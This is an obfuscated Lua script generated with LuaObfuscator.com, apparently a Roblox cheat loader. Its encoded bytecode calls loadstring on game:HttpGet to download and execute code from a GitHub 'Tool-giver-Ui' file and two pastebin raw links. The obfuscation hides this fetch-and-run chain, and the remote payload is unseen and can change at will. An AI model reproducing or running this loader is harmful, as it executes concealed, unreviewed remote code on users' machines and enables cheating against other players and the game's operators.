--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v88=0;while true do if (v88==0) then v19=v0(v3(v30,1,1));return "";end end else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v122=v5(v90,v19);v19=nil;return v122;else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=(1065 -(68 + 997)) -0 ;local v92;while true do if ((0 -0)==v91) then v92=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + ((2198 -(226 + 1044)) -(214 + 713)))) ;return v92-(v92%(1 + 0)) ;end end else local v93=0 + 0 ;local v94;while true do if (v93==(877 -(282 + 595))) then v94=(1639 -(1523 + 114))^(v32-((4 -3) + 0)) ;return (((v31%(v94 + v94))>=v94) and 1) or (0 -0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23() local v37=957 -(892 + 48 + 17) ;local v38;local v39;local v40;local v41;while true do if (v37==(2 -1)) then return (v41 * (31011612 -14234396)) + (v40 * (120312 -54776)) + (v39 * (606 -(87 + 263))) + v38 ;end if (v37==((715 -535) -((1019 -(802 + 150)) + 113))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;v37=2 -1 ;end end end local function v24() local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,2 -1 ,36 -16 ) * (((3 -1) + 0)^((1467 -(145 + 293)) -(915 + 82)))) + v42 ;local v46=v20(v43,(489 -(44 + 386)) -38 ,19 + 12 );local v47=((v20(v43,41 -9 )==((2674 -(998 + 488)) -((3412 -2343) + 118))) and  -(2 -1)) or 1 ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=1 + 0 ;v44=(252 + 539) -(368 + 423) ;end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * (1/((0 + 0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1465 -(416 + 26)) ) * (v44 + (v45/(2^(23 + 29)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(1138 -(116 + 1022))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;local v50={};for v66=773 -(201 + 571) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if ((1 + 0)==v104) then local v119=(function() return 1194 -(352 + 842) ;end)();while true do if (v119==(0 -0)) then local v123=(function() return 1821 -(1483 + 338) ;end)();while true do if (v123==(1695 -(1229 + 466))) then while true do if (v95~=0) then else v96=(function() return v97();end)();if (v98(v96, #"[", #"<")==0) then local v174=(function() return 0;end)();local v175=(function() return;end)();local v176=(function() return;end)();local v177=(function() return;end)();while true do if (v174~=(578 -(386 + 192))) then else local v180=(function() return 0;end)();while true do if (v180==1) then v174=(function() return 1207 -(696 + 510) ;end)();break;end if (0==v180) then local v186=(function() return 0;end)();while true do if (v186==(0 -0)) then v175=(function() return v98(v96,2, #"asd");end)();v176=(function() return v98(v96, #"0313",6);end)();v186=(function() return 1263 -(1091 + 171) ;end)();end if ((1 + 0)==v186) then v180=(function() return 1;end)();break;end end end end end if (v174~=(9 -6)) then else if (v98(v176, #"asd", #"-19")~= #"~") then else v177[ #".com"]=(function() return v101[v177[ #".dev"]];end)();end v102[v103]=(function() return v177;end)();break;end if (v174==(6 -4)) then if (v98(v176, #",", #"|")== #"\\") then v177[376 -(123 + 251) ]=(function() return v101[v177[9 -7 ]];end)();end if (v98(v176,700 -(208 + 490) ,1 + 1 )== #"\\") then v177[ #"asd"]=(function() return v101[v177[ #"xxx"]];end)();end v174=(function() return 3;end)();end if (v174~=(1 + 0)) then else local v182=(function() return 0;end)();while true do if (v182==(836 -(660 + 176))) then v177=(function() return {v99(),v99(),nil,nil};end)();if (v175==0) then local v187=(function() return 202 -(14 + 188) ;end)();local v188=(function() return;end)();while true do if (v187==0) then v188=(function() return 675 -(534 + 141) ;end)();while true do if (v188==0) then v177[ #"19("]=(function() return v99();end)();v177[ #".dev"]=(function() return v99();end)();break;end end break;end end elseif (v175== #",") then v177[ #"-19"]=(function() return v100();end)();elseif (v175==(1 + 1)) then v177[ #"91("]=(function() return v100() -(2^16) ;end)();elseif (v175~= #"gha") then else local v193=(function() return 0;end)();while true do if ((0 + 0)==v193) then v177[ #"91("]=(function() return v100() -(2^16) ;end)();v177[ #"asd1"]=(function() return v99();end)();break;end end end v182=(function() return 1;end)();end if (v182==(1 + 0)) then v174=(function() return 2;end)();break;end end end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end end end if (v104==(0 -0)) then local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if ((0 -0)==v120) then v121=(function() return 0;end)();while true do if ((0 -0)==v121) then v95=(function() return 0 + 0 ;end)();v96=(function() return nil;end)();v121=(function() return 1 + 0 ;end)();end if (v121==1) then v104=(function() return 397 -(115 + 281) ;end)();break;end end break;end end end end end;end)();local v52=(function() return function(v105,v106,v107) local v108=(function() return 0 -0 ;end)();local v109=(function() return;end)();while true do if (0~=v108) then else v109=(function() return 0 + 0 ;end)();while true do if ((0 -0)==v109) then local v124=(function() return 0 -0 ;end)();while true do if (v124==(867 -(550 + 317))) then v105[v106-#"!" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"[",v57 do local v69=(function() return 0 -0 ;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v69~=1) then else if (v70== #",") then v71=(function() return v21()~=(0 -0) ;end)();elseif (v70==(287 -(134 + 151))) then v71=(function() return v24();end)();elseif (v70== #"91(") then v71=(function() return v25();end)();end v58[v68]=(function() return v71;end)();break;end if (v69~=0) then else local v114=(function() return 1665 -(970 + 695) ;end)();while true do if (v114~=(1 -0)) then else v69=(function() return 1991 -(582 + 1408) ;end)();break;end if (v114~=(0 -0)) then else v70=(function() return v21();end)();v71=(function() return nil;end)();v114=(function() return 1;end)();end end end end end v56[ #"19("]=(function() return v21();end)();for v72= #"<",v23() do FlatIdent_946F,Descriptor,v21,v20,v22,v23,v58,v53,v72=(function() return v51(FlatIdent_946F,Descriptor,v21,v20,v22,v23,v58,v53,v72);end)();end for v73= #">",v23() do v54,v73,v28=(function() return v52(v54,v73,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2 -0 ];local v65=v60[11 -8 ];return function(...) local v74=v63;local v75=v64;local v76=v65;local v77=v27;local v78=1;local v79= -(1825 -(1195 + 629));local v80={};local v81={...};local v82=v12("#",...) -(242 -(187 + 54)) ;local v83={};local v84={};for v110=780 -(162 + 618) ,v82 do if (v110>=v76) then v80[v110-v76 ]=v81[v110 + 1 + 0 ];else v84[v110]=v81[v110 + (2 -1) ];end end local v85=(v82-v76) + 1 + 0 ;local v86;local v87;while true do v86=v74[v78];v87=v86[1 -0 ];if ((v87<=(14 -5)) or (2821<2431)) then if (v87<=((167 -(122 + 44)) + 3)) then if ((v87<=(1637 -(1373 + 263))) or (2683>3540)) then if ((v87==(1000 -(451 + 549))) or (2874<2181)) then local v125=(0 -0) + 0 ;local v126;local v127;local v128;local v129;while true do if ((4794>=3275) and (v125==(2 -0))) then for v171=v126,v79 do local v172=0 -0 ;while true do if ((v172==0) or (2689<=343)) then v129=v129 + (1 -0) ;v84[v171]=v127[v129];break;end end end break;end if ((v125==(1384 -(746 + 520 + 118))) or (1869==2009)) then v126=v86[2];v127,v128=v77(v84[v126](v13(v84,v126 + 1 + 0 ,v86[4 -1 ])));v125=342 -(218 + 123) ;end if (((1484==1484) and (v125==(1582 -(222 + 1313 + 46)))) or (3546<2322)) then v79=(v128 + v126) -(1 + 0) ;v129=0 + 0 ;v125=562 -(306 + 254) ;end end else local v130=0;local v131;while true do if ((0 + 0)==v130) then v131=v86[3 -1 ];v84[v131]=v84[v131](v13(v84,v131 + (1468 -((1820 -921) + 568)) ,v79));break;end end end elseif ((v87<=2) or (2082==4773)) then v84[v86[67 -(30 + 35) ]]=v86[2 + 1 + 0 ];elseif (v87==(7 -4)) then local v151=v86[605 -(268 + 335) ];local v152,v153=v77(v84[v151](v13(v84,v151 + 1 ,v86[293 -(60 + 230) ])));v79=(v153 + v151) -(573 -(426 + 146)) ;local v154=0 + (1257 -(1043 + 214)) ;for v163=v151,v79 do v154=v154 + (1457 -(282 + 1174)) ;v84[v163]=v152[v154];end else v84[v86[2]]=v62[v86[814 -(569 + 242) ]];end elseif ((3244>1055) and (v87<=(17 -11))) then if ((v87>5) or (3313<=1778)) then v78=v86[1 + 2 ];else local v135=v86[1026 -(706 + 318) ];local v136=v84[v86[1254 -(721 + 530) ]];v84[v135 + (1272 -(945 + 326)) ]=v136;v84[v135]=v136[v86[9 -5 ]];end elseif ((1432<3555) and (v87<=(7 + 0))) then local v140=v86[702 -(271 + 429) ];v84[v140]=v84[v140](v13(v84,v140 + 1 + 0 ,v79));elseif (v87>(1508 -(1408 + 92))) then v84[v86[(4113 -3025) -((1673 -(323 + 889)) + 625) ]]={};else v84[v86[1290 -(993 + (793 -498)) ]]();end elseif (v87<=(1 + (593 -(361 + 219)))) then if ((v87<=(1182 -(418 + 753))) or (1065>3578) or (1421>=2104)) then if (v87==(4 + 6)) then v84[v86[(321 -(53 + 267)) + 1 ]]=v62[v86[1 + 0 + 2 ]];else do return;end end elseif (v87<=(4 + 8)) then local v144=0;local v145;local v146;while true do if ((529 -(406 + 123))==v144) then v145=v86[1771 -(1749 + 20) ];v146=v84[v86[3]];v144=1 + 0 ;end if (v144==1) then v84[v145 + ((1736 -(15 + 398)) -(1249 + 73)) ]=v146;v84[v145]=v146[v86[4]];break;end end elseif (v87==13) then v84[v86[2]]={};else v84[v86[1 + 1 ]]();end elseif ((v87<=(1161 -((1448 -(18 + 964)) + (2555 -1876)))) or (4795<1407)) then if ((1812<=3249) and (v87>(35 -20))) then if (v84[v86[2]]==v86[11 -7 ]) then v78=v78 + 1 ;else v78=v86[1903 -(106 + 1794) ];end else v84[v86[1 + 1 ]]=v86[1 + 0 + 2 ];end elseif (v87<=(50 -33)) then v78=v86[7 -4 ];elseif ((1623<=1957) and (1853<4813) and (v87==(132 -(4 + 110)))) then if (v84[v86[586 -(57 + 527) ]]==v86[1431 -(41 + 1386) ]) then v78=v78 + (104 -(17 + 86)) ;else v78=v86[3 + 0 ];end else do return;end end v78=v78 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403603Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F41686D613137342F542Q6F6C2D67697665722D55692F726566732F68656164732F6D61696E2F47722Q656E25323048797065726C6173657225323047756E03213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F384B725778644E6A03213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F456838754A384369001F4Q00097Q00120F000100013Q0026100001000C000100020004063Q000C0001001204000200033Q001204000300043Q00200500030003000500120F000500064Q0003000300054Q000100023Q00022Q00080002000100010004063Q001E000100261000010002000100010004063Q00020001001204000200033Q001204000300043Q00200500030003000500120F000500074Q0003000300054Q000100023Q00022Q0008000200010001001204000200033Q001204000300043Q00200500030003000500120F000500084Q0003000300054Q000100023Q00022Q000800020001000100120F000100023Q0004063Q000200012Q000B3Q00017Q00",v9(),...);
